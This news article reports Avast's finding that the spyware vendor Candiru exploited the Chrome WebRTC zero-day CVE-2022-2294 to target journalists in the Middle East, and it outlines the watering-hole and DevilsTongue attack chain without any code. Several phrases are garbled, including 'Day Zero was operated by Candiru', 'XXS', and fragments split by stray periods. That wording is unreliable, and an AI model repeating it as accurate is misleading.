Spyware maker Candiru exploited Google Chrome zero-day to target journalists


A zero-day vulnerability in Google Chrome that was patched earlier this month has been exploited by an Israeli spyware company in attacks targeting journalists in the Middle East.

In a report on Thursday, Czech cybersecurity firm Avast claimed that Day Zero was operated by Candiru, a Tel Aviv-based company, also known as Saito Tech, which offers powerful spyware to government customers.

Candiru has a habit of exploiting previously unknown bugs to deploy Windows malware known as DevilsTongue, which is a modular implant with similar capabilities to NSO Pegasus.

Researchers working for Avast identified the vulnerability in Chrome by examining spyware attacks against the company’s customers.

Avast contacted Google, who acknowledged the issue, assigned it CVE-2022-2294, and fixed it in Chrome version 103.0.5060.114.

Since then, Apple and Microsoft have patched the same vulnerability in their Safari and Edge web browsers.

CVE-2022-2294 is described as a high-severity buffer overflow in WebRTC, which, if successfully exploited, may result in code execution on the victim device.

When Google released the bug fix on July 4, it said the weakness was being actively exploited, but didn’t share any further information.

Avast claims that Candiru began abusing CVE-2022-2294 in March 2022, targeting victims in Lebanon, Yemen, Turkey, and Palestine.

In Lebanon, the attackers gained access to a website used by employees of a news agency. Although it is unclear what the attackers may have been after, threat actors often target journalists in order to directly spy on them, the news they work on, or access their sources to collect sensitive information. that they would share. with the media.

According to Avast, the attackers injected malicious JavaScript code into the infected website, enabling cross-site scripting (XXS) attacks and redirecting valid targets to the exploit server. Thanks to this watering hole attack, they were able to create a profile of the victim’s browser.

This profile consisted of approximately 50 data points including information such as the victim’s native language, time zone, device type, screen information, referrer, browser plugins, and memory. the device, among others.

The information was acquired to ensure that the exploit was only sent to the intended targets.

If they determined that the target was the intended target, an encrypted data exchange was established so that the zero-day exploit could be sent to the victim’s machine.

In the case of Lebanon, the zero-day vulnerability allowed attackers to execute shellcode in a rendering process. They then chained the weakness with a sandbox evade attack to grab an initial foothold and use it to deploy the DevilsTongue payload.

The DevilsTongue malware further used a BYOVD (bring your own vulnerable driver) step to elevate its privileges and gain read/write access to the affected device’s memory.

Researchers claim that the sophisticated malware is capable of logging keystrokes, exfiltrating messages, browsing histories, passwords, geolocation and much more. It can even record using the victim’s camera and microphone.

Zero-day exploits developed by Candiru were the subject of reports from Microsoft, Citizen Lab and Google last year.

The attacks targeted Chrome, Internet Explorer, Safari, as well as Windows, macOS, iOS and Android devices.

According to a Citizen Lab report from April this year, surveillance tools created by Candiru and Israeli surveillance company NSO Group have also been used in Spain.

Both Candiru and NSO Group were blacklisted by the United States last year.


Comments are closed.